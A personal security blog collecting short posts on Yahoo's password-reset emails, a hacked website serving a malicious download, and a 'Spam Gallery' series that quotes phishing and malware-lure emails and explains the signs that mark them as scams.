Yahoo Security Is Still A Joke

Today I got an email from Yahoo.  You know, they’ve been having some security issues lately with millions of accounts being compromised.

The email said they noticed I hadn’t changed my password in a while.  That was kind of odd since I thought I got this email not long ago and humored them by changing my password.  I don’t use Yahoo for anything important anymore, so I didn’t really care.

image

When I looked at where the email was sent to, it was sent to a non-yahoo email address.  It was sent to an email address I used to log in to Facebook.  Putting it together, this was an account I used to log in to Flickr using the Facebook account login option.  It’s been a while since Yahoo gave the middle finger to external logins because they didn’t want to support them anymore.  But that doesn’t mean they cleared all that data out.

So let’s get this right.  I used to log in to Flickr using a Facebook login.  Yahoo discontinued Facebook login ability.  I can’t remember if I converted to a Yahoo account or abandoned it, but regardless, there is an account in Yahoo’s system that has a Facebook email in it.  I can’t find that email anywhere in my password manager.  Even if I did, there’s no Yahoo password for me to change.  It’s a Facebook login.

I used to be pretty neutral on Yahoo.  I didn’t care one way or the other about them.  That’s changed.  I really want them to close up shop.  They are not doing the world any favors with their lack of security and perpetually changing services.

PHP Hacked Site

While doing a search for something innocuous, I found a search result that was very out of place.  The domain was nothing related to what I was searching for, and the text abstract was, to say the least, spammy.  Although I know you’re not supposed to click things like that, I figure I’m pretty secure, so I clicked it.

I was immediately shown a page that said my download would start in 0 seconds, then I was prompted to download an EXE file.  Uh huh.  I browsed to the root domain and it really was a legitimate website.  So now, I wanted to figure out how this happened.  I navigated to the hacked page and I didn’t get any download prompt.  I went back to the search results and clicked again – I got the download prompt.  Hmmm.  More attempts and sometimes the site would send me to a dead page.

image

I looked very hard at the source code and couldn’t find the script that was being injected, but I could see there was a comment <!–counter–> that was getting replaced with the download redirect.  I did a site search on Bing and found many, many, many pages on their website that were suspect.  Also, I saw actual website pages that were in PHP.

So, I had to conclude that the website had a hacked version of PHP, and if that was compromised, the server could do anything it wanted, including checking for referrers and replacing tags in the source code files.  The best I could do was email them and let them know they were hacked and that they had to have their webmaster fix it for them.

Upon further research, it looks like it was a Joomla exploit from a couple of years ago.  I passed that info along and hopefully the website owners can make the updates needed (and clean up all the extra pages).

Spam Gallery–Diliver Your Package

A colleague and I were talking at lunch recently about spam and how clever spam and phishing attempts are getting.  But still, there is still so far to go.  One of the biggest failures of spammers is their sheer stupidity.  If they’re going to use a template from a well-known company, why do they insist on changing the wording of the email?  These people don’t have a grasp of the American English language, much less what professional business correspondence looks like.

image

Starting with the misspelling in the subject, the horrible grammar continues throughout the message.  The point of the email though, is to inform that one of their trucks “is burned tonight”.  This is not a typical business email.

And this spam email suffers from the same problem as every other one.  How did you get my email address? How do you know the package is mine?  I have to assume that people believe that everyone just knows your email address somehow.  Anyone sending you a package seems to implicitly know your email, since UPS and FedEx are sending me package delivery failure email notices all the time.

Spam Gallery–Traffic Violation

The Spam Gallery is a series of posts that give examples of spam messages, explaining telltales signs of how they are spam.

image

I received a series of these emails, as usual with slightly different wording.  The email subject, street name and date varied between the messages.

This has the usual signs of spam: no personal information provided, somewhat unusual language  (“sanction and fine”, “camera shot”), sender email address is not from a domain that suggests an official law enforcement company, and a single available action – opening the attachment.

Some things you would need to ask about the email:

  • How did the “violation center” get my email from my license plate?
  • How do you pay the fine when there is no payment address
  • And most importantly, why is the attachment named “cumshot”?

Maybe the email will catch some people out of curiosity.  Even if you know it’s fake or you know it’s not you, you’re still curious as to what the attachment is.  There’s nothing to be gained by opening any attachment from anyone you don’t know.  If someone walked up to you on the street, handed you a USB drive and told you to run whatever program is on that drive, would it be any more logical than opening an attachment from a stranger?

Spammers Getting Angry

There has been some spam going around for quite a while with an infected zip file attachment sent under the guise of being explicit photos found of you or your girlfriend.  The email subjects and bodies had many variations, but were all pretty much the same.  Some samples:

FW:Why did you put this photo online?

Hi ,

I have a question- have you seen this picture of yours in attachment?? Three facebook friends sent it to me today… why did you put it online? wouldn’t it harm your job? what if parents see it? you must be way cooler than I thought about you man :))))

and

Hey ,

But I really need to ask you – is it you at this picture in attachment? I can’t tell you where I got this picture it doesn’t actually matter… The question is is it really you???.

and

Hey ,

I got to show you this picture in attachment. I can’t tell who gave it to me sorry but this chick looks a lot like your ex-gf. But who’s that dude??.

The emails are somewhat casual, friendly, surprised, or impressed.  But recently, these emails have tried a different tactic, fear and anger.  Look at some of the new messages:

These pictures should be taken down immediately.

Sorry to disturb you …
Why did you have to put these photos online? All the hell is gonna break loose now don’t you understant? Take them down immediately! Don’t tell me you don’t know what photos I’m talking about! Check attachment!

This escalated to:

The criminal investigation agains you has started. Grave privacy violation is a serious thing.

Sorry to disturb you …
Why did you try to break into my FB??? This is the reply from FB support in attachment they idendified you as an attacker who tried to steal my password! Do you know that this is crime actually??

and

You’ll reap just what you sow! You’ll be really sorry about what you’ve done to me.

Hate to bother you …
Do you know who posted these photos online?? This is strange cause there’s your FB acc there. Why did you do it and how did you get my photos?? This is a crime actually do you know?? I put one photo in attachment. We have to clear this thing or else I’ll have to contact my lawer!

Other subject lines:

Let’s put this behind us once and for all  I know you broke into my email.
The police investigation is under way now. You’ll be really sorry about what you have done.
How can you be so cruel to me? I’ll have to react and destroy you.
You can’t say I haven’t warned you  now enjoy the consequences.

While it could be understandable that if written in anger, the email composition and grammar would be terrible, which is normally a giveaway for spam.  But like most spam, these emails play off of curiosity, even if you know you’re not the one the attacker is looking for.  Who wouldn’t want to see the picture that’s gotten the author so upset?  The new tactic is to get the recipient in a defensive or worried state so they confirm that it really isn’t them involved in the fake incident.

Spam Gallery–Tutoring Materials

The Spam Gallery is a series of posts that give examples of spam messages, explaining telltales signs of how they are spam.

image

This message loses all credibility through misspellings.  In addition, the email address is totally different from the sender’s name (Stacy).  Finally, although the email is addressed to “co-workers”, this email is only sent to one person.

Spam Gallery–Tax Draw Payment

The Spam Gallery is a series of posts that give examples of spam messages, explaining telltales signs of how they are spam.

image

Tax time in America, a time of windfall payments to countless people.  Some people see it as their yearly bonus, although it’s actually your own money being returned to you.  So it’s no wonder that a scammer would try to take advantage of this.

The biggest flaw of this email is the use of the term “Tax Draw”, which has no meaning in the U.S.  Other things of note would be:

  • A dollar amount that is ridiculous.  The only thing that this could hope to gain is curiosity.
  • A document that is a ZIP file, not a normal document format.
  • No personal details: no name, account number, contact information.  Not even a thank you.
  • Bare-bones instructions with poor grammar.

If an email isn’t personal, it isn’t for you.  It’s very safe to just ignore it.

Spam Gallery–Your Order For Helicopter

The Spam Gallery is a series of posts that give examples of spam messages, explaining telltales signs of how they are spam.

image

This spam message is just pretty humorous.  Here’s the things I can see wrong:

  • Poor grammar for a business email.
  • Times in 12hr and 24hr format
  • Currency incorrectly formatted
  • Email address of sender inconsistent with name
  • “Single choice” link in email
  • No contact information of company
  • No personalized greeting or other identifying information.

The email may pique curiosity, so that you want to click the link to see what the total cost of renting a helicopter would be.  Think of someone approaching you on the street and saying, “Wanna see a dead body?”

Spam Gallery – Manager

The Spam Gallery is a series of posts that give examples of spam messages, explaining telltales signs of how they are spam.

image

This email is clearly spam.  The numerous spelling and grammar errors throughout should be enough to discredit it completely.  Some of the mistakes are strange and humorous.  “Up to 50,000 USD per annum”, after which I guess your pay simply stops?  “Vacant educational training”? “PayPal Manager”?

This spam falls under a similar type as online dating scams, where you voluntarily give information to the scammers.  If you send your resume to this email address, they have quite a good leg up on stealing your identity.  If they want more, they can simply say that you are hired and ask for your SSN and banking information for payroll.  Then what?

This email has no contact information.  There is a name, which is unverifiable.  There is a company name, which doesn’t match the domain of the email address (gmx.us is a free email host).  There is no address, website, or phone number.  This is just like other “single choice” emails, where you can only do one thing in the email, and that is exactly what the spammer wants.

Beware of too-good-to-be-true offers.  If this was a job offer, wouldn’t you want to research the company first?  There’s no links to the company website.

Spam Gallery–Reward Notification

The Spam Gallery is a series of posts that give examples of spam messages, explaining telltales signs of how they are spam.

image

This piece of mail has an interesting trait of being a forgery of another spam service.  Gift Certificate Delivery.com is probably a legitimate business, but assuredly is one that should not exist.  In any case, this email is using their email template to get you to click the links and get infected.

The email uses the first part of the email address (JSmith, jane.doe) to give it legitimacy, but a real email from a real company would use your real name.  They would have that in their database.  The other clue is that the links all direct to latestyearsvacation.info, which has nothing to do with gift certificates, rewards, or anything else. 

One thing that is interesting though, is t the spammers actually purchased a valid domain name and hosting services to host their infection files.  Usually, the files would be hosted on a hacked legitimate website in a hidden folder so the spammers wouldn’t have to pay anything.

Always check the link addresses, and don’t  assume you’re getting something for free.  That’s not the way the world works.